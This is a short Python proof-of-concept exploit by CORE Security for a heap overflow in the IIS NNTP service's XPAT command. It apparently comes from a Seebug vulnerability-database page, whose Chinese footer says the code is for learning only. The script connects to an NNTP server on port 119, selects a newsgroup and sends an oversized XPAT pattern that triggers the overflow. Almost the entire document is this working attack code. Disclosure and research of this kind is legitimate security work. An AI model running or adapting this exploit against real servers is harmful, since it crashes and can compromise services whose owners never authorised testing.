#-- # IIS NNTP Service XPAT command heap overflow proof of concept # # Author: # Lucas Lavarello (lucas at coresecurity dot com) # Juliano Rizzo (juliano at coresecurity dot com) # # Copyright (c) 2001-2004 CORE Security Technologies, CORE SDI Inc. # All rights reserved. # # THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR # CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF # THIS SOFTWARE # # www coresecurity com #-- from socket import * host = "127.0.0.1" pat = "C"*1946 + " " + "X"*10 newsgroup = "control.newgroup" sock = socket(AF_INET, SOCK_STREAM) sock.connect((host, 119)) print sock.recv(512) sock.send("group %s\x0d\x0a" % newsgroup) print sock.recv(512) sock.send("xpat From 1-9 %s \x0d\x0a" % pat)
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
匿名 兑换PoC
京公网安备 11010502034610号
暂无评论